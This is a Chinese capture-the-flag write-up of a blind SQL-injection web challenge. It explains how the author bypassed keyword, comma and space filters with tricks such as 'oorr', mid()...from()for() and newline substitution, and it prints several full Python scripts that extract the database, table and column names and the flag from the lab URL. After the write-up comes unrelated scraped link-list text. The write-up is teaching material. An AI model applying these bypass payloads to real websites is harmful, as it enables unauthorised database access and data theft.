实验吧——WEB-认真一点!

article/2025/8/28 23:25:11

认真一点!

打开链接,看到这个页面,第一反应又是sql注入
在这里插入图片描述
翻翻源码没有任何提示
打开burp开始抓包,包头与返回头又没有任何提示,试着开始修改ID 的值,观察页面变化。

  1. 提交1或用语句让框内为真,显示You are in。

  2. 提交语句有错误或语句让框内为假,不报错,但显示You are not in(实质和报错一样)

  3. 提交某些特殊字符会被过滤并显示sql injection detected,经过各种测试(可用Burp suite进行模糊测试或脚本提交敏感字符)发现过滤的字符有and,空格,+,#,union,逗号。

  4. 提交语句id=1’or’1’='2,如果网页对or没有任何处理的话,应返回You are in(因为后面的语句错误,相当于只提交id=1),但返回的却是You are not in,说明or被处理了。一般的后台处理逻辑是匹配or、or(不分大小写)、or+空格并替换为空。尝试改变大小写和用oorr代替,发现回显都为You are in,也就是说,后台处理应该是匹配or(小写),并将其替换为空,并且仅仅处理了一次。所以在接下来的语句构造中我们可以用oorr,OR等代替or。

接下来用python脚本进行盲注

  1. 由于提取字符函数substr()被过滤了,用mid()函数达到同样效果

  2. 由于逗号被过滤了,在mid()函数中用from(%d)for(1)代替逗号分隔符,如mid((database())from(1)foorr(1))代表库名第一个字母(for中的or也被过滤了,所以用foorr)。

  3. 由于空格被过滤了,我们用
    flag = flag.replace(’ ', chr(0x0a))
    将构造语句中的空格用chr(0x0a),也就是换行符\n替代(这也行?),其实在原代码语句中,后面用括号代替空格的情况也可以改回用空格了。

  4. 提醒requests.post(url,data)中的data一定要是字典{id:“ ”}。

  5. 猜长度的语句和猜字母的一样,只不过放在后面的字母为’’,同时做一个计数器,当匹配到空时,说明名字匹配结束,返回计数器当前的数字就是名字长度。

(group_concat(table_name separatoorr ‘@’)
(group_concat(column_name separatoorr ‘@’)

用以上语句代替table_name和column_name,是因为可能有多个表段和多个字段,这个语句让多个表名,字段名一起输出并用@将之分隔。

当前数据库名的长度:

import requestsstr1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
for i in range(1,30):key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}r = requests.post(url, data=key).textprint(i)if str1 in r:print('the length of database is %s'%i)break

在这里插入图片描述
接下来开始跑数据库名:

import requestsguess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
database = ''
for i in range(1,19):for j in guess:key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)}r = requests.post(url, data=key).textprint(key)if str1 in r:database += jprint(j)break
print(database)

在这里插入图片描述
接下来跑表的长度:

import requestsguess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
i = 1
while True:flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%iflag = flag.replace(' ', chr(0x0a))key = {'id':flag}       r = requests.post(url, data=key).textprint(key)if str1 in r:print('the length of tables is %s'%i)breaki += 1

在这里插入图片描述
接下来跑表名:

import requestsguess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
tables = ''
for i in range(1,12):for j in guess:        flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i, j)    flag = flag.replace(' ', chr(0x0a))key = {'id':flag}       r = requests.post(url, data=key).textprint(key)if str1 in r:tables += jprint(j)breakprint(tables)

在这里插入图片描述
跑完发现有两张表,两张表之间用@分隔开来,一看就知道flag就在fiag表中了,接下来跑列长:

import requestsguess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
i = 1
while True:flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%iflag = flag.replace(' ', chr(0x0a))key = {'id':flag}       r = requests.post(url, data=key).textprint(key)if str1 in r:print('the length of columns is %s'%i)breaki += 1

在这里插入图片描述

接下来跑列名:(这里虽然写的6,但我们的搜索条件是第6个为空,那么字符长度应该为5)

import requestsguess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
columns = ''
for i in range(1,6):for j in guess:        flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)    flag = flag.replace(' ', chr(0x0a))key = {'id':flag}       r = requests.post(url, data=key).textprint(key)if str1 in r:columns += jprint(j)breakprint(columns)

在这里插入图片描述
接下来跑字段长度:

import requestsguess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
i = 1
while True:flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%iflag = flag.replace(' ', chr(0x0a))key = {'id':flag}       r = requests.post(url, data=key).textprint(key)if str1 in r:print('the length of data is %s'%i)breaki += 1

在这里插入图片描述
这里虽然跑出来14位,可是后面发现根本不止14位。因为数据中含有的-是空格转义来的,脚本识别到就以为数据结束了。最后把flag跑出来:

import requestsguess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
data = ''
for i in range(1,20):for j in guess:        flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)    flag = flag.replace(' ', chr(0x0a))key = {'id':flag}       r = requests.post(url, data=key).textprint(key)if str1 in r:data += jprint(j)breakprint(data)

在这里插入图片描述
因为这里的-实际是由空格转义来的,所以真正的flag是flag{haha~you win!}


http://chatgpt.dhexx.cn/article/H53RGI2V.shtml

相关文章

实验....

实验要求 r1代表运营商 r1远程登录r2实际登陆r9 r3访问r7的换回地址走r5 全网可达 1.全网可达 配置ip 2配置rip协议,r8r9用v1其余用v2 3让r8r9接入内网,在r8对端接口写入v2 r3访问r7的换回地址走r5 r1代表运营商 r1远程登录r2实际登陆r9 先打开r…

实验吧 认真一点!

真的很久很久没碰过这个玩意了,真是不会了,而且这个题目本身就不是很容易,搞得我也是满肚子邪火,很气。这个题目主要难在它吧过滤和ban结合到了一起了。我们还是先看题目,首先拿到题目看到输入id0和输入id1结果不一样,…

让我进去-实验吧

这题做的真的是久,莓办法,太菜了 进去看见cookie有个source值很奇怪,把他改成1试一下就收到这段代码 $flag "XXXXXXXXXXXXXXXXXXXXXXX"; $secret "XXXXXXXXXXXXXXX"; // This secret is 15 characters long for secu…

实验吧

1.变异凯撒 把flag转化为ascii码,加密密文转化为ascii码, 因为是凯撒加密,所以思考移动的位数,分别是加了5,6,7,8.。。。 所以移动的位次是从5递加 得到结果 ascii码值转化,得到flag…

[大学物理实验-5]波尔共振实验

[大学物理实验-5]波尔共振实验 前言实验预习(Preview)实验报告(Report)实验报告(Report)总结(Sum up) 前言 最近在整理一些学过的课程的资料,有一些课虽然和我的专业毫无…

实验一-Bomblab(炸弹实验)

实验概述:该实验就是通过分析汇编代码,并使用GDB调试,找到每一题的通关钥匙 第一关:(key“He is evil and fits easily into most overhead storage bins.”) 简单解析:比…

实验.........

首先配置ip地址和环回地址 以r1为例 先用ospf联通r2r3r4r5r6r7 以r2为例 r1启bgp与r2建邻 r2r3r4r5r6r7同理建邻居 这里以r2为例 r7r8建邻方法同r1r2 优化在r2上

实验........

实验....... 先配置ip地址以r2为例 然后配置rip同样以r2为例 启用bgp建立对等体,需要书写as号 以r1与r3为例 建立ebgp 以r3r4为例 r3 r4 建立换回,以环回为对等提

shlab实验

计算机系统原理实验报告 一、实验目的及内容 1. 实验目的:通过编写完善一个支持作业控制的简单 Unix 外壳 Shell 程序(tsh), 掌握 shell 的基本功能原理和实现方法;掌握 Unix 进程控制、特别是信号的应用, 包括信号产生和信号…

Lab2实验分享

文章目录 一.TLB访存机制二.二级页表三.Page存储结构四.自映射机制图示五.页面与地址的转化六.部分实验代码详解 一.TLB访存机制 当一个虚拟地址被送到MMU中进行翻译的时候,硬件首先在TLB中寻找包含这个地址的页面,如果它的虚页号在TLB中,并…

实验吧(1)

实验吧真是一个神奇的地方,里面的东西表示全部都看不懂,emmmmm ,加油!好好学习! 案例:忘记密码了! 在实验吧里面打开解题链接,然后就会跳转到一个输入密码的页面,当然你…

实验吧 认真一点

本实验是输入id获取结果,查看页面源码,没有什么注释信息。随便输入个1,结果为You are in ...............,其他的id显示为You are not in ............... 使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。…

实验吧_网站综合渗透_Discuz!

前言 这个一个实验吧中的环境,分值为50分,下面是题目说明。诶,发现自己很菜。 实验吧_网站综合渗透_dedecms解析地址 需要的学会或者已经掌握的知识 已知cms版本在线搜索通用漏洞掌握菜刀或者类似的工具的使用其他 题目说明 你是国内一流安…

实验吧-简单的登录题——WriteUp再研究

前言 这个题目的难点就是在于对于CBC加密方式尤其是解密这部分要琢磨一番,让我想起当年大学的时候信安三勇中的两勇的课,一门密码学,一门数学基础,可怕之极。这个题网上writeup一大堆,但是在一些方面解释的不是很详细…

实验吧-简单的登录题

前言 这是在实验吧上面的一道web题。主要考察cbc字节反转攻击。 分析 题目开始就是输入id去登录 首先想到的就是sql注入了,输入1后页面显示Hello,重新载入的话页面返回报错信息 确实存在注入,看那后面的逗号,猜测注入点在limit后面。然后试了很多,发现题目把union,#…

前端框架是什么意思?

说起前端框架,很多人都不知道是什么意思,下面本篇文章就来给大家介绍一下前端框架是什么意思?希望对大家有所帮助。 前端框架是什么意思? 前端框架一般指用于简化网页设计的框架,使用广泛的前端开发套件,比…

优秀的前端开发框架

优秀的前端开发框架 1.Vue Vue2文档:Vue.js Vue3文档:Vue.js - 渐进式 JavaScript 框架 | Vue.js 用于构建用户界面的渐进式框架 Vue的核心库只关注视图层。可与elementUI配合Element - The worlds most popular Vue UI framework 2.React 原先的Fa…

matplotlib 绘图 显示中文

参考: Matplotlib中正确显示中文的四种方式 在 matplotlib 中无法直接显示中文(比如使用: plt.xlabel(), plt.ylabel, plt.title()等) from matplotlib import pyplot as pltplt.plot(np.arange(5)) plt.xlabel(x 标签) plt.ylabel(y 标签) plt.title(标题) plt.show()运行上述…

Matplotlib入门:等高线图contour

import matplotlib.pyplot as plt import numpy as npdef f(x,y):return (1-x/2x**5y**3)*np.exp(-x**2-y**2)n 256 x np.linspace(-3,3,n) y np.linspace(-3,3,n)# 生成网格 X,Y np.meshgrid(x,y)# contourf 会在等高线之间进行填充 plt.contourf(X,Y,f(X,Y),8,alpha0.75,…

matplotlib设置坐标轴

import numpy as np设置x,y范围 x np.linspace(-3,3,100) y1 2*x 1 y2 x**2#xy范围 plt.xlim((-1,2)) plt.ylim((-2,3))plt.plot(x,y1,colorred,linewidth1.0,linestyle--) plt.plot(x,y2,colorblue,linewidth5.0,linestyle-) #color指的是线的颜色,linewidth指…